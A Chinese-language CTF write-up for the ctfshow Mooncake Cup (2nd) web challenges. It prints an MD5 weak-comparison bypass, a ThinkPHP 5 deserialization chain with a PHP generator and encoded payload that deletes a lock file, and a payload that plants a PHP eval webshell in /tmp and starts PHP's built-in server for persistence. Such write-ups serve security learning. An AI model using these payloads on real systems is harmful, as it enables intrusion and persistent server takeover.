ctfshow—月饼杯(第二届)web wp
web签到
<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {echo "小伙子不错嘛!!flag给你了:" . $flag;} else {echo "偶吼,带黑阔被窝抓到了!!!!";}
}
$a==md5($a)
0e215962017
的 MD5 值也是由 0e 开头,在 PHP 弱类型比较中相等
eztp
<?php
namespace app\index\controller;
class Index
{ public function index($run=[]){highlight_file(__FILE__);echo '<h1>Welcome to CTFSHOW</h1></br>';echo 'Powered by PHPthink5.0.2</br>';echo dirname(__FILE__);if (!empty($run[2])){echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';}if (!empty($run[1])){unserialize($run[1]);}}// hint:/index/index/backdoorpublic function backdoor(){if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){echo "Try to post CMD arguments".'<br/>';$data = input('post.');if (!preg_match('/flag/i',$data['cmd'])){$cmd = escapeshellarg($data['cmd']);$cmd='cat '.$cmd;echo $cmd;system($cmd);}else{echo "No No No";}}else{echo dirname(__FILE__).'/../../'."install.lock has not been deleted";}}
}
通过backdoor
得到flag,但需要先删除install.lock
根据报错信息,Thinkphp版本为5.0.2
可以利用Thinkphp5.1任意文件删除漏洞
<?php
namespace think\process\pipes;
use think\Process;
class Pipes{}
class Windows extends Pipes{private $files = [];function __construct(){$this->files = ["/var/www/html/application/index/controller/../../install.lock"];}
}
echo urlencode(serialize(New Windows()))."\n";
?>
传参数
/index.php/index/index/?run[1]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Findex%2Fcontroller%2F..%2F..%2Finstall.lock%22%3B%7D%7D
成功删除后访问/index.php/index/index/backdoor
POST
cmd=/fl%99ag
不要离开我
<?php// 题目说明:
// 想办法维持权限,确定无误后提交check,通过check后,才会生成flag,此前flag不存在error_reporting(0);
highlight_file(__FILE__);$a=$_GET['action'];switch($a){case 'cmd':eval($_POST['cmd']);break;case 'check':file_get_contents("http://checker/api/check");break;default:die('params not validate');
}
内置Web Server
CLI SAPI 提供了一个内置的Web服务器。
这个内置的Web服务器主要用于本地开发使用,不可用于线上产品环境。
URI请求会被发送到PHP所在的的工作目录(Working Directory)进行处理,除非你使用了-t参数来自定义不同的目录。
如果请求未指定执行哪个PHP文件,则默认执行目录内的index.php 或者 index.html。如果这两个文件都不存在,服务器会返回404错误。
当你在命令行启动这个Web Server时,如果指定了一个PHP文件,则这个文件会作为一个“路由”脚本,意味着每次请求都会先执行这个脚本。如果这个脚本返回 false
,那么直接返回请求的文件(例如请求静态文件不作任何处理)。否则会把输出返回到浏览器。
php -S 开启内置服务器 -t 指定目录
payload:
http://xxxxx/?action=cmd
POST
cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST[a]);?>");system ("sleep 5 && php -S 0.0.0.0:80 -t /tmp/");
在可写的/tmp目录下传木马并写系统命令,然后提交5秒内进⾏check,check会关闭nginx和php-fpm,由于是www-data权限,⽆法启动nginx和php-fpm,直接启动php内置服务器即可。
参考链接:
https://lewiserii.github.io/2021/09/21/ctfshow-WP/CTFshow-%E6%9C%88%E9%A5%BC%E6%9D%AF(%E7%AC%AC%E4%BA%8C%E5%B1%8A)-%E9%83%A8%E5%88%86wp/
ctfshow—月饼杯(第二届)web wp相关推荐
- ctfshow 月饼杯(第二届) 部分WriteUp
Misc 杂项签到 右键附件,从链接另存文件.然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可. ctfshow{we1come_to_mooncake_cap ...
- CTFshow月饼杯crypto部分wp
CTFshow月饼杯crypto部分wp crypto 1 题目描述: 密文如下: 第一行给出为自动密码,搜索到相关文章下载break_autokey.py和相关的词频统计脚本,修改ctext跑一下发 ...
- 天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
资源下载地址: ``` 天山杯第二届新疆工业互联网安全大赛 https://download.csdn.net/download/rickliuxiao/86734942 ``` 题目提供了 Who ...
- 2022“望友杯”第二届全国电子制造行业 PCBA 设计大赛-华南分赛区火热报名中~
随着全球电子产品功能性越来越强,集成度越来越高,信号速率越来越快,研发周期也越来越短,我国的电子产业也在市场的驱动下不断向个性化.精密化.高速化发展.PCBA 设计已经成为产品硬件开发中非常重要的一环 ...
- “曹光群杯·第二届全国大学生绿色化妆品创新创意大赛”启动仪式在沪举办
2023年5月12日,"曹光群杯·第二届全国大学生绿色化妆品创新创意大赛"启动仪式在2023中国化妆品产学研协同创新论坛上举行. 曹光群杯·第二届全国大学生绿色化妆品创新创意大赛启 ...
- “未来杯”第二届知识图谱锦标赛小组赛结果及16强总决赛名单公布
点击蓝字 关注我们 AI TIME欢迎每一位AI爱好者的加入! 以"让知识构建未来"为主题的"未来杯"第二届知识图谱锦标赛于2022年10月22日和23日两天, ...
- CTFshow月饼杯(第二届) 中秋快乐 部分wp
苟,都可以苟 只要我osint做的够快我就不会被刷掉.jpg 体验很好,下次还来( 注:tao2更新 目录 1.web web签到 2.crypto 我的木头啊!!! 一封信 3.misc proje ...
- CTFshow月饼杯(第二届) 中秋快乐 套套去哪儿出题思路+解法
附件如上 题目名称:套套去哪儿 题目描述:套套在去一次旅游的路程中,在飞机上随手拍了这张照片,你能找出他在哪儿吗?(经过出题人的暴打,套套说这张照片是在2021年6月3号下午飞机航班"中途& ...
- 南昌大学航天杯第二届程序设计竞赛校赛网络同步赛题解
A,C,I签到题,只搞了8题,还一题是神仙做的,我不会 链接:https://www.nowcoder.com/acm/contest/122/B 来源:牛客网 取石子 时间限制:C/C++ 1秒,其 ...
最新文章
- iPhone地图 实战iPhone GPS定位系统
- sql 服务器实例怎样显示,如何查看sql数据库的服务器名
- ubuntu mysql 驱动_怎么在Ubuntu下为MySQL添加ODBC驱动?
- 面向对象葵花宝典:思想、技巧与实践(36) - 设计原则如何用?
- MongoDB 和 Python 不通用的操作
- fastapi 传输文件存文件_揭秘|国内影视文件传输的真相,跨境文件传输更不简单...
- Perl一行式:处理空白符号
- hadoop 文件介绍
- Qt4_读取和写入文本
- 【翻译】Windows下文件的命名
- LoadRunner测试一个简单的AJAX例子
- 关于投资收益和风险的例题(线性规划)
- PMP的含金量价值主要表现在哪些方面?
- ffmpeg音视频剪辑常用操作
- 百度贴吧客户端(Android)网络通信行为分析
- yarn application -kill application_id yarn kill 超时任务脚本
- 用AkShare获取实盘沪深可转债数据
- java解析xml文件并写入Excel表
- 怎么做安全生产月PPT专题课件?
- ubuntu18安装office2010